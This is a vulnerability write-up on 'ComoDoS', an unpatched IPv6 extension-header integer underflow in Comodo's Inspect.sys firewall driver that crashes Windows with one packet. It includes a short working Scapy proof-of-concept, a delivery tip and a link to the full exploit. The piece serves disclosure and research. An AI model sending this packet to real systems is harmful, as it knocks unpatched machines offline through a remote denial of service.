How a Single IPv6 Packet Crashes Comodo’s Firewall Driver (ComoDoS)

Event Overview

As of publication the vulnerability remains a zero‑day.

From BYOVD Research to Remote Kernel Exploitation

A system was built to locate local‑privilege‑escalation bugs in third‑party Windows kernel drivers. AI flagged drivers from security vendors as low‑hanging fruit, leading to a focused analysis of Comodo Internet Security’s firewall driver Inspect.sys.

Finding a Useful Bug

Analysis started with a 2014 version of Inspect.sys, which still contained design flaws. The first bug appears in the IPv4 header parser: the driver does not verify that the Internet Header Length (IHL) is smaller than the Total Length. The parser subtracts the total length from the header length, so setting IHL larger than Total Length triggers an integer underflow, causing the payload size to be calculated as roughly 4 billion bytes.

RFC‑compliant routers drop such malformed IPv4 packets, making remote exploitation difficult, though local or LAN attacks remain possible.

IPv6: Larger Attack Surface

IPv6 parsing is more complex and its extension‑header mechanism allows packets to traverse multiple routers without being discarded. The fixed IPv6 header is 40 bytes; the next header field indicates the type of the following header, and a chain of extension headers must be fully traversed, creating fertile ground for parsing bugs.

ComoDoS: One Packet, One Crash

The vulnerability resides in the loop that processes each IPv6 extension header. For each header the code subtracts the header’s length from packet_desc->payload_length without checking for underflow. When the attacker sets payload_length smaller than the total extension‑header length, the unsigned 64‑bit value wraps to its maximum. For example, setting payload_length to 8 and an extension length of 16 yields 0xFFFFFFFFFFFFFFF8 (≈18 exabytes).

Proof‑of‑concept code (Scapy) is extremely compact:

ext = IPv6ExtHdrDestOpt(nh=6, options=[PadN(optdata=b"\x00"*8)])
 tcp = TCP(sport=1337, dport=80, flags="S", seq=0, ack=1, window=0x2000)
 ipv6 = IPv6(dst=dst_ip, nh=60, hlim=64, plen=8)
 pkt = ipv6 / ext / tcp
 send(pkt)

The packet triggers a crash regardless of firewall rules or open ports; even a configuration that blocks all traffic is bypassed.

Test tip: on systems without IPv6 support, enable “filter IPv6 traffic” in the Comodo firewall and send the crafted packet directly to the target NIC’s MAC address.

An Avoidable Failure

The driver also contains a reachable control path that permits an out‑of‑band write via memcpy. In the WebDAV scanner the payload length field is truncated to 16 bits (64 KB). Reading 65 KB can touch unmapped memory and crash the system. The scanner stops after encountering \r or \n, so a minimal HTTP GET header can terminate the scan early.

In this path the size argument to memcpy is derived from the underflowed length field and is 32 bits, resulting in a memcpy of roughly 4 GB, which inevitably crashes the system.

Triggering this primitive requires a full TCP handshake and at least one open TCP port on the target. Even if the underflow size were limited below 4 GB, heap grooming, ASLR and other mitigations make reliable remote code execution unlikely.

Conclusion

The ComoDoS vulnerability demonstrates an IPv6 integer underflow in a firewall driver that allows a single packet to crash a Windows system. While the bug is unlikely to be weaponised into remote code execution, it highlights the prevalence of driver‑level flaws in security products and the need for strict validation of extension‑header parsing and payload‑length limits.

Full PoC code: https://github.com/MalwareTech/ComoDoS